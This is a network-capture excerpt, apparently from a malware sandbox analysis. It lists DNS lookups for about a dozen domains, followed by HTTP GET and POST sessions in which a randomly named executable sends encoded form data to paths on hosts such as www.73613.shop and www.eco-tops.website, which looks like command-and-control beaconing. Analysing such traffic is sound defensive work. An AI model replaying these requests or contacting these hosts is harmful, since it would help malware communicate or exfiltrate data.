                                                                            Dec 10, 2024 16:24:29.445977926 CET192.168.2.51.1.1.10x3ab2Standard query (0)www.astrext.infoA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:30.442056894 CET192.168.2.51.1.1.10x3ab2Standard query (0)www.astrext.infoA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:44.962354898 CET192.168.2.51.1.1.10x7c74Standard query (0)www.newhopetoday.appA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:00.179809093 CET192.168.2.51.1.1.10xc531Standard query (0)www.binacamasala.comA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:24.214154005 CET192.168.2.51.1.1.10x85d5Standard query (0)www.dlion.netA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:45.806879044 CET192.168.2.51.1.1.10xb58aStandard query (0)www.bioart.buzzA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:46.820292950 CET192.168.2.51.1.1.10xb58aStandard query (0)www.bioart.buzzA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:01.571108103 CET192.168.2.51.1.1.10xbd32Standard query (0)www.06753.photoA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:02.582622051 CET192.168.2.51.1.1.10xbd32Standard query (0)www.06753.photoA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:17.524209976 CET192.168.2.51.1.1.10xba33Standard query (0)www.gucciqueen.shopA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:37.900413990 CET192.168.2.51.1.1.10xfd12Standard query (0)www.premium303max.restA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:38.895178080 CET192.168.2.51.1.1.10xfd12Standard query (0)www.premium303max.restA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:53.352015972 CET192.168.2.51.1.1.10xed9aStandard query (0)www.mnpl.onlineA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:27:01.856993914 CET192.168.2.51.1.1.10xc51eStandard query (0)www.locuramagica.onlineA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 10, 2024 16:23:43.233179092 CET1.1.1.1192.168.2.50xb5e6No error (0)www.regents.healthregents.healthCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:43.233179092 CET1.1.1.1192.168.2.50xb5e6No error (0)regents.health3.33.130.190A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:43.233179092 CET1.1.1.1192.168.2.50xb5e6No error (0)regents.health15.197.148.33A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:59.872495890 CET1.1.1.1192.168.2.50x655cNo error (0)www.73613.shop180.178.39.236A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:59.872495890 CET1.1.1.1192.168.2.50x655cNo error (0)www.73613.shop180.178.39.235A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:59.872495890 CET1.1.1.1192.168.2.50x655cNo error (0)www.73613.shop180.178.39.237A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:23:59.872495890 CET1.1.1.1192.168.2.50x655cNo error (0)www.73613.shop180.178.39.238A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:15.087203026 CET1.1.1.1192.168.2.50x5786No error (0)www.eco-tops.website203.161.49.193A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:30.498300076 CET1.1.1.1192.168.2.50x3ab2No error (0)www.astrext.info217.160.0.132A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:30.580530882 CET1.1.1.1192.168.2.50x3ab2No error (0)www.astrext.info217.160.0.132A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:24:45.915019989 CET1.1.1.1192.168.2.50x7c74No error (0)www.newhopetoday.app216.40.34.41A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:00.687053919 CET1.1.1.1192.168.2.50xc531No error (0)www.binacamasala.combinacamasala.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:00.687053919 CET1.1.1.1192.168.2.50xc531No error (0)binacamasala.com3.33.130.190A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:00.687053919 CET1.1.1.1192.168.2.50xc531No error (0)binacamasala.com15.197.148.33A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:24.654818058 CET1.1.1.1192.168.2.50x85d5No error (0)www.dlion.netdlion.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:24.654818058 CET1.1.1.1192.168.2.50x85d5No error (0)dlion.net46.38.243.234A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:46.917283058 CET1.1.1.1192.168.2.50xb58aNo error (0)www.bioart.buzzcn-hk2.rvh2.raincs.cnCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:46.917283058 CET1.1.1.1192.168.2.50xb58aNo error (0)cn-hk2.rvh2.raincs.cn74.48.34.43A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:46.958142996 CET1.1.1.1192.168.2.50xb58aNo error (0)www.bioart.buzzcn-hk2.rvh2.raincs.cnCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:25:46.958142996 CET1.1.1.1192.168.2.50xb58aNo error (0)cn-hk2.rvh2.raincs.cn74.48.34.43A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294172049 CET1.1.1.1192.168.2.50xbd32No error (0)www.06753.photouaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294172049 CET1.1.1.1192.168.2.50xbd32No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294172049 CET1.1.1.1192.168.2.50xbd32No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294214964 CET1.1.1.1192.168.2.50xbd32No error (0)www.06753.photouaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294214964 CET1.1.1.1192.168.2.50xbd32No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:03.294214964 CET1.1.1.1192.168.2.50xbd32No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:18.279344082 CET1.1.1.1192.168.2.50xba33No error (0)www.gucciqueen.shopgucciqueen.shopCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:18.279344082 CET1.1.1.1192.168.2.50xba33No error (0)gucciqueen.shop178.79.184.196A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:39.021040916 CET1.1.1.1192.168.2.50xfd12No error (0)www.premium303max.rest45.79.252.94A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:39.032732010 CET1.1.1.1192.168.2.50xfd12No error (0)www.premium303max.rest45.79.252.94A (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:26:53.759470940 CET1.1.1.1192.168.2.50xed9aName error (3)www.mnpl.onlinenonenoneA (IP address)IN (0x0001)false
                                                                            Dec 10, 2024 16:27:02.340205908 CET1.1.1.1192.168.2.50xc51eNo error (0)www.locuramagica.online31.31.198.145A (IP address)IN (0x0001)false
                                                                            • www.regents.health
                                                                            • www.73613.shop
                                                                            • www.eco-tops.website
                                                                            • www.astrext.info
                                                                            • www.newhopetoday.app
                                                                            • www.binacamasala.com
                                                                            • www.dlion.net
                                                                            • www.bioart.buzz
                                                                            • www.06753.photo
                                                                            • www.gucciqueen.shop
                                                                            • www.premium303max.rest
                                                                            • www.locuramagica.online
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.5497573.33.130.190801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:23:43.367466927 CET534OUTGET /q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.regents.health
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:23:49.466730118 CET392INHTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Tue, 10 Dec 2024 15:23:49 GMT
                                                                            content-length: 271
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 54 4a 30 62 68 43 3d 4b 4b 32 31 75 57 30 78 48 76 6f 72 53 6b 32 76 71 63 4b 44 36 77 63 53 53 50 4f 2b 68 79 58 51 44 6b 32 4c 30 59 57 46 39 64 43 4b 6d 55 75 74 67 76 31 76 52 6c 7a 54 76 53 73 68 61 30 50 73 6a 67 58 31 58 5a 65 4b 35 4a 30 64 48 56 77 49 51 6d 32 42 39 42 77 7a 4c 65 49 74 6f 68 55 37 77 43 55 34 6d 54 66 43 53 45 43 63 53 2b 2b 39 44 56 47 39 7a 78 71 54 43 46 56 58 74 74 65 56 6d 67 3d 3d 26 50 74 3d 66 44 6c 48 6f 4e 57 50 30 52 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd"}</script></head></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.549796180.178.39.236801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:00.074867010 CET779OUTPOST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 71 4d 38 73 51 7a 30 67 37 68 76 51 79 31 75 45 65 79 45 49 39 75 74 6e 2f 67 59 66 59 41 74 35 50 56 77 42 7a 69 53 62 30 76 6f 4b 6e 36 31 5a 75 33 73 36 75 59 53 6b 6a 2f 7a 34 57 30 68 6f 62 4e 62 31 54 58 61 6f 66 46 74 31 37 2f 34 77 63 6b 65 67 68 6b 4a 36 51 2b 51 65 2f 6e 71 56 53 33 55 48 37 53 71 4d 7a 4f 59 41 71 72 38 74 42 71 76 46 6b 4d 71 4e 4b 75 5a 6f 38 74 64 2f 50 6c 69 6f 45 63 75 70 66 66 47 33 6c 32 63 52 6a 62 46 4b 73 74 6d 64 4a 61 39 72 66 4e 76 56 66 7a 30 5a 64 34 46 70 2f 72 48 5a 4c 63 69 34 45 73 52 52 61 6b 45 73 71 73 3d
                                                                            Data Ascii: UTJ0bhC=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKstmdJa9rfNvVfz0Zd4Fp/rHZLci4EsRRakEsqs=
                                                                            Dec 10, 2024 16:24:01.517070055 CET249INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:07 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.549802180.178.39.236801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:02.772902012 CET799OUTPOST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 4c 38 38 76 7a 62 30 78 4c 68 6f 4f 43 31 75 4f 2b 79 41 49 39 69 74 6e 2b 6c 46 66 71 55 74 34 74 39 77 41 33 32 53 63 30 76 6f 41 48 36 38 64 75 33 33 36 75 46 76 6b 68 72 7a 34 53 55 68 6f 66 64 62 31 67 50 5a 71 50 46 76 73 72 2f 36 39 38 6b 65 67 68 6b 4a 36 55 57 36 65 2b 50 71 56 6d 4c 55 42 75 6d 74 53 6a 50 71 48 71 72 38 6e 68 71 72 46 6b 4d 59 4e 50 50 2b 6f 2f 56 64 2f 4c 68 69 72 51 49 78 6e 66 66 4d 76 46 33 72 52 7a 47 32 47 50 64 4a 41 70 54 72 31 38 49 4f 64 4a 43 65 44 2f 77 74 36 66 48 2f 4a 59 55 56 70 30 4e 34 4c 35 30 30 79 39 36 4d 49 64 6e 59 7a 32 75 61 6f 39 67 4c 4f 41 6c 47 64 52 48 75
                                                                            Data Ascii: UTJ0bhC=nkKelaCdXUds+L88vzb0xLhoOC1uO+yAI9itn+lFfqUt4t9wA32Sc0voAH68du336uFvkhrz4SUhofdb1gPZqPFvsr/698keghkJ6UW6e+PqVmLUBumtSjPqHqr8nhqrFkMYNPP+o/Vd/LhirQIxnffMvF3rRzG2GPdJApTr18IOdJCeD/wt6fH/JYUVp0N4L500y96MIdnYz2uao9gLOAlGdRHu
                                                                            Dec 10, 2024 16:24:04.236289024 CET249INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:10 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.549808180.178.39.236801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:05.439795971 CET1816OUTPOST /tizt/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.73613.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.73613.shop
                                                                            Referer: http://www.73613.shop/tizt/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 4c 38 38 76 7a 62 30 78 4c 68 6f 4f 43 31 75 4f 2b 79 41 49 39 69 74 6e 2b 6c 46 66 71 73 74 35 63 64 77 42 57 32 53 64 30 76 6f 4d 6e 36 35 64 75 32 74 36 75 64 72 6b 68 6e 46 34 55 59 68 36 6f 31 62 7a 52 50 5a 6a 50 46 76 6b 4c 2f 35 77 63 6b 58 67 68 30 4e 36 51 79 36 65 2b 50 71 56 6e 62 55 51 37 53 74 51 6a 4f 59 41 71 72 67 74 42 71 54 46 6c 6b 79 4e 50 43 4a 70 4f 31 64 2f 72 78 69 6b 44 77 78 76 66 66 43 73 46 33 7a 52 7a 4b 70 47 50 42 76 41 71 50 53 31 38 41 4f 4d 49 6e 52 66 66 45 4e 68 73 62 36 44 5a 4a 30 33 6a 4e 6b 46 71 31 4f 77 65 57 31 4a 66 4b 30 36 32 43 71 75 50 31 62 53 47 49 57 63 52 69 30 55 69 4d 59 66 2b 43 43 37 63 6c 66 4f 70 79 36 54 6c 7a 53 4d 5a 53 6f 51 67 66 65 6f 6b 52 77 2b 77 5a 72 6e 72 69 75 6d 7a 59 35 74 66 44 62 34 61 58 6d 35 51 77 47 37 45 75 70 4d 6f 35 53 37 39 31 45 37 63 38 2f 67 51 59 71 41 78 49 71 7a 63 30 66 75 44 4a 65 45 36 79 6c 4f 62 6b 57 44 2b 47 6d 77 68 44 4a 54 63 50 46 4f 55 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=nkKelaCdXUds+L88vzb0xLhoOC1uO+yAI9itn+lFfqst5cdwBW2Sd0voMn65du2t6udrkhnF4UYh6o1bzRPZjPFvkL/5wckXgh0N6Qy6e+PqVnbUQ7StQjOYAqrgtBqTFlkyNPCJpO1d/rxikDwxvffCsF3zRzKpGPBvAqPS18AOMInRffENhsb6DZJ03jNkFq1OweW1JfK062CquP1bSGIWcRi0UiMYf+CC7clfOpy6TlzSMZSoQgfeokRw+wZrnriumzY5tfDb4aXm5QwG7EupMo5S791E7c8/gQYqAxIqzc0fuDJeE6ylObkWD+GmwhDJTcPFOUzwAeZkIGkNDs9B/MKvrklo9kKujWKXVjhnST8EGGmuUOmw0lX3HC/Uu+8emD11wQbBcQGc+abMXkfjEKTli+cmuDYt03ECA0KAegype5WbSHRJAbRVp37BOjVhLbRftG7nTOXsd9a3DC/JEQRc8ZFtxFlzcs+AwvYDfk4KYvdMLIjzmk6Pmj/aLt6YROLxyjGLTCfGYHxha7iH7tFwdWV4o83HNWP4kSZd/ba8B95SjpnLuRGj/KJxw2HCXtZVTdn4hhBSA95LIVAO9cd8FYnK/FY5kHYTkbw9SWV7qwagoqohcAC0NkzONgK6u6I5pNMK4UKIDcK6KNCPiaH8F0yZFeG0lw0TmBpUrrHJq2AYfgY88O1MBXguwDe61jVwq2RY3qSBGCII9ENlM2TKkDMdZjiw4vgr2BUJyOAeDN6YBzNPvpDLCEGnrpNFZOPUr0g+KIYdbAVYV+9sZ6dGBGe6weYKX1bJid1z5lCTr13GwgzqOALgi5Bnr1VPqRk8wwxrRIiQOaD5VWXa1qZUpYJGvjzk63egS37q9ya7o7goseaTzbmkCsSr9usrBT6lNzJyowt8nb2iTwLt21SDWvMeY27rbvnChBiZz+3JNDl0XJcr1j6fX7nVQfRiBJDqqmccpSTtqVRoMYnN+LanMeBJbPRUUQsuleA9 [TRUNCATED]
                                                                            Dec 10, 2024 16:24:06.935085058 CET249INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:13 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.549816180.178.39.236801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:08.087457895 CET530OUTGET /tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.73613.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:24:09.611648083 CET249INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.2
                                                                            Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            X-Powered-By: 3.2.1
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549833203.161.49.193801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:15.241458893 CET797OUTPOST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 53 72 32 4e 2b 4e 77 4d 71 45 63 4f 6f 2b 6e 42 68 71 4a 44 39 50 47 68 6b 6c 59 71 43 2b 32 34 65 48 6d 4e 53 34 5a 56 6e 55 69 7a 51 6c 2f 49 47 64 4e 66 34 73 75 57 30 4e 75 52 6b 4c 71 41 55 72 57 64 42 67 42 2f 6c 49 67 75 64 77 58 6b 59 59 37 6b 54 4d 6b 4a 6e 51 77 54 2b 79 64 71 61 59 6e 61 7a 44 53 66 57 6d 30 46 6e 7a 62 4f 35 50 74 33 6a 62 39 68 62 43 64 61 38 71 57 41 36 2f 69 66 43 53 6b 2b 47 33 69 79 79 6b 37 2b 41 2f 78 48 56 54 71 58 48 58 45 77 52 44 38 31 66 2b 5a 41 67 37 33 79 53 42 68 4a 47 73 36 36 32 56 51 6d 6a 50 73 70 30 4a 73 3d
                                                                            Data Ascii: UTJ0bhC=jntZs3mRZ7WZSr2N+NwMqEcOo+nBhqJD9PGhklYqC+24eHmNS4ZVnUizQl/IGdNf4suW0NuRkLqAUrWdBgB/lIgudwXkYY7kTMkJnQwT+ydqaYnazDSfWm0FnzbO5Pt3jb9hbCda8qWA6/ifCSk+G3iyyk7+A/xHVTqXHXEwRD81f+ZAg73ySBhJGs662VQmjPsp0Js=
                                                                            Dec 10, 2024 16:24:16.446311951 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549839203.161.49.193801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:24:17.907798052 CET817OUTPOST /n54u/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.eco-tops.website
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.eco-tops.website
                                                                            Referer: http://www.eco-tops.website/n54u/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
